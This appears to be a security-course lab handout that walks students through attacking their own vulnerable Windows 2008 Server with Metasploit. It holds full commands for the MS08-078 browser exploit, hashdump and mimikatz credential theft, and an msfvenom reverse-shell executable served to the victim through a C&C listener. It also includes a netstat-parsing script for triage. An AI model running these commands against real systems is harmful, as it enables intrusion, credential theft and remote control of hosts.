A11: Metasploit v. Windows (25 pts)

What You Need

  1. A Kali Linux machine, real or virtual
  2. The vulnerable Windows 2008 Server you prepared in the previous project

A11.1: Exploitation via MS08-078 (10 pts)

In Kali, execute these commands (one at a time) to start Metasploit, search for the MS08-078 module, and display information about it.

service postgresql start
msfdb init
msfconsole
search ms08-078
info exploit/windows/browser/ms08_078_xml_corruption

As shown below, this exploit doesn't require any parameters--the default values are OK.

Execute these commands to run the exploit.

use exploit/windows/browser/ms08_078_xml_corruption
exploit

As shown below, the exploit starts a malicious Web server and displays a Web address, labelled "Local IP".

On the Windows target, open Internet Explorer and go to that Web address.

A Meterpreter session opens, as shown below.

Post-Exploitation

In Kali, execute these commands to open the Meterpreter shell interactively, capture a screen shot, get the password hashes, escalate to SYSTEM privileges, load mimikatz, and steal the plaintext Administrator password from the Windows system.

sessions -i 1
screenshot
hashdump
getuid
getsystem
load mimikatz
kerberos

The Administrator password appears, as shown below.

In Kali, execute this command to get information about the system being exploited:

sysinfo

Find the build number, which is covered by a green box in the image below.

That number is the flag. In Kali, execute these commands to exit Metasploit.

exit
exit

Task 3: Exploitation via Infectious Media (10 pts)

In Kali, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from a malicious Web server.

Adjust the IP address to match the IP address of your Kali machine (the C&C server).

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.188 -f exe > fun.exe
cp fun.exe /var/www/html
service apache2 start

In Kali, execute these commands to start a C&C listener.

msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit

On your Windows machine, in Firefox, go to this URL, replacing the IP address with the IP address of your Kali machine:

http://172.16.1.188/fun.exe

Download fun.exe and run it.

On your Kali machine, a Meterpreter session opens.

In Kali, execute this command to list the network connections on the Windows target being exploited:

netstat

Find the ESTABLISHED connection to your Kali machine and read its "Program name", which is covered by a green box in the image below.

That name is the flag.
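The last step above is the same check a responder makes when triaging a host: which process owns an established connection to a suspicious remote address. The following Python is an added example, not part of the lab; the listing it parses is constructed in the column layout of Meterpreter's netstat output (an assumption about that layout), and every address, PID and process name in it is made up.

```python
# Constructed sample in the layout of the Meterpreter "netstat" listing:
# Proto, Local address, Remote address, State, User, Inode, PID/Program name.
# Addresses, PIDs and program names are invented for this example.
SAMPLE_NETSTAT = """\
Connection list
===============

    Proto  Local address       Remote address      State        User  Inode  PID/Program name
    -----  -------------       --------------      -----        ----  -----  ----------------
    tcp    0.0.0.0:135         0.0.0.0:*           LISTEN       0     0      704/svchost.exe
    tcp    0.0.0.0:445         0.0.0.0:*           LISTEN       0     0      4/System
    tcp    172.16.1.10:49170   172.16.1.188:4444   ESTABLISHED  0     0      2412/fun.exe
    tcp    172.16.1.10:49171   172.16.1.5:445      ESTABLISHED  0     0      4/System
    udp    0.0.0.0:123         0.0.0.0:*                        0     0      1068/svchost.exe
"""

PROTOCOLS = ("tcp", "udp", "tcp6", "udp6")


def parse_connections(listing):
    """Turn the listing into a list of dicts, one per connection row.

    UDP rows have an empty State column, so a plain whitespace split yields
    six fields instead of seven; they are kept with state set to ''.
    """
    rows = []
    for line in listing.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] not in PROTOCOLS:
            continue  # title, header and separator lines
        if len(fields) == 7:
            proto, local, remote, state, user, inode, prog = fields
        else:
            proto, local, remote, user, inode, prog = fields
            state = ""
        pid, _, name = prog.partition("/")  # "2412/fun.exe" -> 2412, "fun.exe"
        rows.append({"proto": proto, "local": local, "remote": remote,
                     "state": state, "pid": int(pid), "program": name})
    return rows


def established_to(listing, remote_host):
    """Return (program, pid, remote) for each ESTABLISHED connection to remote_host."""
    hits = []
    for row in parse_connections(listing):
        host = row["remote"].rsplit(":", 1)[0]  # strip the port
        if row["state"] == "ESTABLISHED" and host == remote_host:
            hits.append((row["program"], row["pid"], row["remote"]))
    return hits
```

Run against a real Meterpreter netstat listing, `established_to(listing, "<your Kali IP>")` returns the same program name the lab asks you to read off the screenshot.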

Reading Assignment

Read this article:

Situational Awareness for Meterpreter Users

Answer the questions below:

11.3 What type of token allows you to take over the world? (2 pts)

11.4 What meterpreter command moves your session to a different process? (3 pts)


Posted 4-5-19
Point value for 11.2 corrected 4-8-19
Revised for WCIL 5-20-19